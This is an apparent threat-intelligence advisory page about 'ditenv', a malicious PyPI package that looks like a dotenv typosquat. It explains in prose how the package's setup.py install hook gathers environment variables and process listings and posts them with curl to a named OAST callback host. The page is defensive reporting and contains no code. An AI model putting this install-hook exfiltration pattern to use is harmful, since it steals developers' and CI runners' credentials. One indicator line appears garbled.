Supply-chain threat intelligence

Incident detail

criticalpypi·typosquatting·osv

Malicious code in ditenv (PyPI)

ditenv

Risk score

92

AI summary

Indexed incident for ditenv (pypi).

Description

setup.py overrides the install and egg_info commands with a RunCommand() class that fires unconditionally on pip install or pip download. The override reads the entire process environment via os.environ, serializes every key=value pair, captures the output of ps -elf, and POSTs the combined payload over plaintext HTTP via curl to a hardcoded interactsh/OAST subdomain (gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun). On developer machines and CI runners, the captured environment routinely contains AWS_SECRET_ACCESS_KEY, GH_TOKEN, NPM_TOKEN, PYPI_TOKEN, and similar credentials, all of which are leaked to an arbitrary attacker-controlled callback host. The package name is suggestive of a dotenv typosquat and the README self-identifies as a proof-of-concept; a comment claims the code is 'for research not for doing any harmful activity', but the cover story does not change the fact that any installer is subjected to live credential theft.

During installation, the package exfiltrates env variables


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-ip-rotat

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • exfiltration-env-variables

  • typosquatting

Technical details

Affected versions

=0.0.1

Indicators

  • affected version=0.0.175%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents